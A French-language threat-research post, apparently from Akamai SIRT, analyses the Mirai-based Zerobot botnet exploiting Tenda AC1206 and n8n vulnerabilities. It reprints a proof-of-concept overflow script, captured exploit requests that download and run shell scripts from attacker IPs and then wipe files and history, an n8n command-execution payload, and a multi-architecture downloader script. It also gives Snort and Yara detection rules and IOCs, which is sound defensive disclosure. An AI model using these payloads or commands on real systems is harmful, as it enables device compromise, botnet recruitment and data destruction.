Synthèse
- L'équipe Security Intelligence and Response (SIRT) d'Akamai a identifié une exploitation active des vulnérabilités d'injection de commandes CVE-2025-7544 et CVE-2025-68613 visant des routeurs Tenda AC1206 ainsi que la plateforme d'automatisation n8n.
- L'équipe SIRT a identifié cette activité dans notre réseau mondial de pots de miel pour la première fois en janvier 2026. Il s'agit de la première exploitation active signalée de ces vulnérabilités depuis leurs divulgations initiales, respectivement en juillet 2025 et décembre 2025.
- Nous avons inclus une liste d'indicateurs de compromission (IOC) dans cet article de blog pour aider à la défense contre cette menace.
Introduction
L'équipe SIRT d'Akamai a découvert une campagne de logiciels malveillants en cours, basée sur Mirai et baptisée Zerobot, ciblant plusieurs CVE récentes et notamment celles affectant les routeurs Tenda AC1206 ainsi que la plateforme d'automatisation des flux de travail n8n. Cette campagne de botnet remonte au moins à début décembre 2025. Les tentatives d'exploitation les plus récentes ont été observées mi-janvier 2026 dans notre réseau mondial de pots de miel, et visaient à diffuser une variante du logiciel malveillant Mirai.
Le choix de cibler la vulnérabilité n8n retient tout particulièrement l'attention : les botnets exploitent généralement les terminaux de l'Internet des objets (IoT), tels que les caméras de surveillance, les enregistreurs vidéo numériques et les routeurs, alors que n8n appartient à une catégorie complètement différente.
Bien que ce type de comportement ne soit pas entièrement inédit pour les botnets, ce ciblage accroît nettement le niveau de risque pour les entreprises : l'exploitation de n8n peut en effet permettre à un acteur malveillant d'effectuer des mouvements latéraux au sein d'infrastructures plus critiques.
Vulnérabilités ciblées
Les observations du SIRT indiquent que Zerobot cible deux vulnérabilités distinctes : CVE-2025-7544 et CVE-2025-68613. Les horodatages des tentatives d'exploitation dans nos pots de miel sont postérieurs à la divulgation publique des CVE, ce qui confirme qu'il ne s'agissait pas de vulnérabilités Zero Day.
De nos jours, l'exploitation opportuniste de vulnérabilités récemment divulguées est une pratique courante chez les acteurs malveillants. Même les entreprises les plus rigoureuses en matière de gestion des correctifs connaissent généralement une période d'exposition après la divulgation initiale, tandis que certaines ne procèdent tout simplement pas aux mises à jour nécessaires.
Informations sur la vulnérabilité CVE-2025-7544
Publiée mi-juillet 2025, CVE-2025-7544 est une vulnérabilité de dépassement de tampon sur la pile exploitable à distance, qui affecte le point de terminaison /goform/setMacFilterCfg des routeurs Tenda AC1206 en version 15.03.06.23. Classée critique, elle peut être exploitée via le paramètre deviceList. Dans la fonction parse_macfilter_rule, la variable s (ou v3) est transmise à la fonction strcpy sans aucune vérification de longueur, ce qui permet de provoquer un dépassement du tampon dest (s_2) sur la pile.
En formulant une simple requête HTTP, un attaquant (même à distance) peut facilement déclencher une attaque par déni de service (DoS) ou une exécution de code à distance (RCE). Une preuve de concept (PoC) publique est disponible et décrit en détail la vulnérabilité et son exploitation (Figure 1).
import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
"macFilterType": "white",
"deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)Informations sur la vulnérabilité CVE-2025-68613
Publiée mi-décembre 2025, CVE-2025-68613 est une vulnérabilité RCE, jugée critique, qui affecte le système d'évaluation des expressions dans la plateforme d'automatisation de flux de travail n8n (versions 0.211.0 à 1.20.4, puis 1.21.1 et 1.22.0).
Dans n8n, les utilisateurs peuvent écrire des expressions dans les flux de travail pour traiter dynamiquement des données. Or, ces expressions n'étaient pas évaluées dans un environnement sandbox approprié, ce qui permettait aux attaquants de sortir du contexte d'exécution prévu et d'exécuter du code arbitraire sur le serveur. En exécutant ces expressions au niveau du système sous-jacent, un attaquant pouvait également lire et écrire des fichiers sur le serveur, dérober des variables d'environnement (telles que des clés API) et maintenir une présence persistante.
La vulnérabilité est relativement facile à exploiter, ne nécessite qu'un compte utilisateur sans privilèges administrateur et permet d'accéder à l'ensemble des données auxquelles n8n a accès. De nombreuses entreprises ont recours à n8n pour divers cas d'usage : intégration de bases de données avec des services cloud, automatisation du traitement de données, gestion d'informations sensibles, connexion de diverses plateformes et systèmes internes, etc. Une PoC publique est également disponible pour cette vulnérabilité.
Exploitation active de Tenda et n8n
Notre équipe SIRT a observé des tentatives d'exploitation actives de CVE-2025-7544 par Zerobot dans notre réseau mondial de pots de miel à partir de mi-janvier 2026. Comme illustré en Figure 2, la tentative d'exploitation déclenche le dépassement de tampon en utilisant 500 caractères « A » dans le paramètre deviceList, ce qui permet ensuite d'exécuter du code arbitraire. L'exploitation télécharge et exécute ensuite un script shell malveillant nommé tol.sh à partir de l'adresse IP américaine 144.172.100.228.
/goform/setMacFilterCfg
macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -cL'équipe SIRT a également observé Zerobot tentant d'exploiter l'une des récentes vulnérabilités de n8n, CVE-2025-68613 (Figure 3). Le fonctionnement est grandement similaire : la tentative d'exploitation télécharge et exécute le script shell tol.sh pour récupérer et charger la charge utile principale du logiciel malveillant Mirai de zerobotv9.
/rest/workflow/run
{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}
S'il ne s'agit pas de la première fois qu'un botnet basé sur Mirai cible n8n, cela marque néanmoins une rupture notable avec les schémas d'exploitation habituels des terminaux IoT. La possibilité pour un botnet d'obtenir un accès et d'établir une présence persistante, et éventuellement d'effectuer des mouvements latéraux au sein d'une infrastructure critique, représente un risque majeur pour les entreprises.
Botnet Zerobot
Le script shell présenté en Figure 4 récupère et exécute la charge utile principale du logiciel malveillant Mirai, nommée zerobotv9, qui prend en charge de nombreuses architectures. C'est un comportement classique pour les téléchargeurs Mirai. Cette charge utile, compressée avec UPX, contient de nombreuses chaînes et de nombreux paramètres chiffrés, dont un domaine de commande et contrôle codé en dur (0bot.qzz[.]io), et la chaîne d'exécution de console Mirai standard, ici « bruh why again ».
L'appellation Zerobot remonte à un article publié par Fortinet en 2022, sans qu'un lien direct avec les acteurs actuels puisse être établi. La nomenclature suggère qu'il s'agirait de la neuvième itération du logiciel malveillant Zerobot, bien que l'existence des huit autres versions reste à confirmer.
Hormis la découverte initiale en 2022, nous avons identifié des échantillons publics nommés zerobotv2 datés d'août 2025, mais ils semblent correspondre à la variante Mirai couramment utilisée, LZRD.
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4Il existe de nombreuses différences entre la version originale de Zerobot de 2022 et les échantillons plus récents de Zerobotv9. La plus notable est que l'original réside dans la taille et le langage : Zerobotv9 est bien moins volumineux et n'est pas écrit en Go.
Nous avons toutefois identifié des échantillons Zerobot datés d'octobre 2022, provenant de l'adresse IP initiale du téléchargeur et n'étant pas écrits en Go. Cette variante d'octobre 2022, tout comme Zerobotv9, utilise la même clé XOR Mirai d'origine, 0XDEADBEEF ou 0x22.
Cette nouvelle version dispose également de diverses fonctions d'attaque absentes de la précédente, notamment TCPXmas, Mixamp, SSH ainsi qu'une méthode d'attaque nommée Discord. Les agents utilisateur codés en dur sont illustrés en Figure 5.
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94Exploitations supplémentaires
Bien que cet article porte principalement sur l'exploitation active des terminaux Tenda et de la plateforme n8n, l'équipe SIRT a également observé Zerobot ciblant d'autres vulnérabilités, notamment CVE-2017-9841 (Figure 6), CVE-2021-3129 (Figure 7) et CVE-2022-22947 (Figure 8), entre autres.
Ces tentatives diffèrent légèrement des tentatives d'exploitation mises en avant ici : elles utilisent netcat et socat pour ouvrir une connexion TCP brute et lire les données depuis le socket vers stdout, avant d'exécuter des commandes permettant de charger la charge utile principale de Mirai.
Les acteurs malveillants ont également employé cette méthode contre les vulnérabilités n8n et Tenda, avec plusieurs solutions de repli, notamment via sockets Perl, redirection TCP Bash, sockets PHP et sockets Python. Cette technique était utilisée dans un premier temps début décembre 2025, avant de laisser place à des outils comme curl et wget en janvier 2026.
Conclusion
Malheureusement, malgré plusieurs démantèlements très médiatisés par les forces de l'ordre, la prolifération de Mirai se poursuit. La mise en place d'un botnet basé sur Mirai présente en effet une barrière à l'entrée relativement faible. Attiré par des gains financiers rapides, ou simplement par le défi, un acteur peu expérimenté peut réutiliser d'anciennes bases de code Mirai avec de légères modifications, voire itérer rapidement à l'aide d'outils d'IA.
Le développement d'attaques « Zero Day » n'est pas non plus nécessaire, car cibler simplement des CVE récemment divulguées ou des équipements obsolètes que certaines entreprises omettent de mettre à jour peut s'avérer très efficace. Cela ne conduit pas forcément à des botnets massifs et médiatisés comme Aisuru, mais peut générer des revenus suffisants tout en permettant aux opérateurs de rester sous les radars.
La divulgation reste un bénéfice global
Comme nous l'avons déjà souligné, le programme CVE peut parfois agir comme une arme à double tranchant, car il met en lumière des vulnérabilités qui auraient autrement pu passer inaperçues aux yeux des acteurs malveillants. Même si nous estimons que ce programme soit globalement bénéfique pour le secteur, il convient de garder à l'esprit que les attaquants surveillent activement ces divulgations afin d'exploiter les fenêtres d'opportunité qui s'ouvrent avant que les organisations ne puissent déployer des correctifs efficaces.
Les vulnérabilités Tenda et n8n exploitées par Zerobot disposaient toutes deux de PoC publiques, ce qui accroît fortement la facilité et la rapidité de leur exploitation active. n8n étant parfois utilisé au cœur de flux de travail critiques, il est vivement recommandé aux entreprises potentiellement concernées de sécuriser et corriger leurs systèmes dans les meilleurs délais afin de se prémunir contre cette menace, et contre toute autre activité malveillante.
Suivez-nous
L'équipe SIRT d'Akamai continuera à surveiller ces menaces et à en rendre compte, tant pour nos clients que pour la communauté de la sécurité dans son ensemble. Pour rester au fait des publications de l'équipe SIRT et du groupe Security Intelligence d'Akamai, consultez notre page d'accueil de recherche et suivez-nous sur les réseaux sociaux.
IOCs
Nous avons inclus une liste d'indicateurs de compromission, ainsi que des règles Snort et Yara, pour aider les défenseurs.
Règles Snort pour les adresses IP malveillantes
alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Règles Snort pour la détection de résolution de domaine C2
alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)Règles Yara pour les échantillons de logiciels malveillants
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-01-29"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$bruh = "bruh why again"
$url1 = "mamakmukekkontol"
$url2 = "inihiddenngentod"
$ip1 = "140.233.190.96"
$ip2 = "144.172.100.228"
$ip3 = "172.86.123.179"
$ip4 = "216.126.227.101"
$ip5 = "103.59.160.237"
$domain1 = "0bot.qzz.io"
$domain2 = "andro.notemacro.com"
$domain3 = “pivot.notemacro.com”
$hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
$hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
$hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
$hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
$hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
$hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
$hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
$hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
$hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
$hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"
condition:
(
$url1 or
$url2 or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9 or
$hash10
)
}Adresses IPv4 malveillantes
103.59.160.237
140.233.190.96
144 172 100 228
172.86.123.179
216 126 227 101
Domaines malveillants
0bot.qzz.io
andro.notemacro[.]com/inihiddenngentod/zerobotv9.*
pivot.notemacro.com/inihiddenngentod/zerobotv9.*
Hachages SHA256
c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f
360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da
cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24
045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57
d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7
deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060
6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e
2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3
263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c
d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616
Mots-clés
